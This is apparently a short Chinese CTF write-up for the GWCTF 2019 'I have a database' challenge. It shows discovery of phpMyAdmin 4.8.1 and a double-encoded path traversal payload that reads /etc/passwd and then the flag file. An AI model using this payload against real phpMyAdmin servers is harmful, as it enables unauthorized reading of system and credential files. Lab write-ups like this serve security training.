[GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库

MuXgRq8khz-pyAgmmFK9C7DThVPeVjYBRu1Dv0QHz6Y

打开环境是乱码,用dirsearch扫描发现phpmyadmin

vfufA-jJI0fMBsanJIxO5tEYNeEDL_hoO72VIqT1ses

进入链接发现版本是4.8.1

kUdvStKWYySID9xnHI6quk7F0SY9G7-2u1oYXkggMlo

这里找了几篇参考资料进行学习:

https://www.freebuf.com/column/207707.html

https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd

https://www.jianshu.com/p/fb9c2ae16d09

使用 ?target=pdf_pages.php%253f/../../../../../../../../etc/passwd 确定漏洞是否存在

kXNAREtC-ndNtyAEXxgh7BXNejH1jyNqHAvxjLgMbKE

确定漏洞存在后,经过测试可以知道flag的位置,访问?target=pdf_pages.php%253f/../../../../../../../../flag得到flag

fyrQJRngz6oaMEGvNDJVIJg5quGhE8-UXRuPWqi357o

posted on 2024-02-09 13:04  跳河离去的鱼  阅读(39)  评论(0编辑  收藏  举报